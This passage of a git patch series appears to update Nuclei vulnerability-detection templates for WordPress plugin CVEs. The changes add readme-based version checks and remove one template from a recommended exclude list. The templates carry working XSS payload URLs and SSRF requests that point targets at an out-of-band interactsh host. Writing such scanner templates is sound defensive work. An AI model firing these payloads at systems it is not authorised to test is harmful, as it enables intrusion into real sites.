"{{BaseURL}}/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" diff --git a/http/cves/2016/CVE-2016-1000139.yaml b/http/cves/2016/CVE-2016-1000139.yaml index cd49c560e4f..9b5c5aba7f6 100644 --- a/http/cves/2016/CVE-2016-1000139.yaml +++ b/http/cves/2016/CVE-2016-1000139.yaml @@ -31,7 +31,23 @@ info: google-query: inurl:"/wp-content/plugins/infusionsoft" tags: cve2016,cve,wordpress,wp-plugin,xss,wpscan,infusionsoft_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/infusionsoft/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Infusionsoft' + - 'Tags:' + condition: and + case-insensitive: true + - method: GET path: - "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22" diff --git a/http/cves/2017/CVE-2017-17059.yaml b/http/cves/2017/CVE-2017-17059.yaml index 8ae41e17000..b0286fddb1b 100644 --- a/http/cves/2017/CVE-2017-17059.yaml +++ b/http/cves/2017/CVE-2017-17059.yaml @@ -33,7 +33,7 @@ flow: http(1) && http(2) http: - raw: - | - GET /wp-content/plugins/indexisto/readme.txt HTTP/1.1 + GET /wp-content/plugins/amty-thumb-recent-post/readme.txt HTTP/1.1 Host: {{Hostname}} matchers: From d1201a3f3868b22c50e9817dcfcd19beafac5bec Mon Sep 17 00:00:00 2001 From: Ritik Chaddha Date: Tue, 26 Mar 2024 23:09:57 +0530 Subject: [PATCH 5/7] Update CVE-2016-1000138.yaml --- http/cves/2016/CVE-2016-1000138.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2016/CVE-2016-1000138.yaml b/http/cves/2016/CVE-2016-1000138.yaml index a4980b959a6..9215654aa73 100644 --- a/http/cves/2016/CVE-2016-1000138.yaml +++ b/http/cves/2016/CVE-2016-1000138.yaml @@ -37,6 +37,7 @@ http: - | GET /wp-content/plugins/indexisto/readme.txt HTTP/1.1 Host: {{Hostname}} + matchers: - type: word internal: true From 72f30f24420c7fe5b7e6d3ab0f37569c9b405cf6 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha Date: Tue, 26 Mar 2024 23:28:35 +0530 Subject: [PATCH 6/7] added-flow(oast) --- http/cves/2020/CVE-2020-28976.yaml | 15 +++++++++++++++ http/cves/2022/CVE-2022-0591.yaml | 12 ++++++++++++ .../wordpress/wp-under-construction-ssrf.yaml | 13 +++++++++++++ 3 files changed, 40 insertions(+) diff --git a/http/cves/2020/CVE-2020-28976.yaml b/http/cves/2020/CVE-2020-28976.yaml index 989df6769d0..fe452435e75 100644 --- a/http/cves/2020/CVE-2020-28976.yaml +++ b/http/cves/2020/CVE-2020-28976.yaml @@ -30,7 +30,22 @@ info: framework: wordpress tags: cve2020,cve,packetstorm,ssrf,wordpress,wp-plugin,oast,edb,canto +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/canto/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Canto' + - 'Tested up to:' + condition: and + - method: GET path: - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}" diff --git a/http/cves/2022/CVE-2022-0591.yaml b/http/cves/2022/CVE-2022-0591.yaml index d6a1ed0594d..33835011a60 100644 --- a/http/cves/2022/CVE-2022-0591.yaml +++ b/http/cves/2022/CVE-2022-0591.yaml @@ -30,7 +30,19 @@ info: fofa-query: body="formcraft3" && body="wp-" tags: cve,cve2022,wp,wp-plugin,wordpress,formcraft3,wpscan,ssrf,unauth,subtlewebinc +flow: http(1) && http(2) + http: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: word + internal: true + words: + - '/wp-content/plugins/formcraft3/' + - method: GET path: - '{{BaseURL}}/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://{{interactsh-url}}' diff --git a/http/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml b/http/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml index ca5e2ae4320..764d019c4e6 100644 --- a/http/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml +++ b/http/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml @@ -14,7 +14,20 @@ info: max-request: 1 tags: ssrf,wp,wp-plugin,wordpress,unauth,wpscan,packetstorm +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/under-construction-maintenance-mode/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - '= Under Construction' + - raw: - | POST /wp-admin/admin-ajax.php HTTP/2 From 188505adad1a537884932a74659ce89941e3e389 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 8 Apr 2024 13:13:21 +0530 Subject: [PATCH 7/7] Update recommended.yml --- config/recommended.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/config/recommended.yml b/config/recommended.yml index fd09c67f0a5..910982340fb 100644 --- a/config/recommended.yml +++ b/config/recommended.yml @@ -75,7 +75,6 @@ exclude-id: - optilink-ont1gew-gpon-rce - sar2html-rce - zimbra-preauth-ssrf - - wp-under-construction-ssrf - wp-xmlrpc-pingback-detection - fastjson-1-2-41-rce - fastjson-1-2-42-rce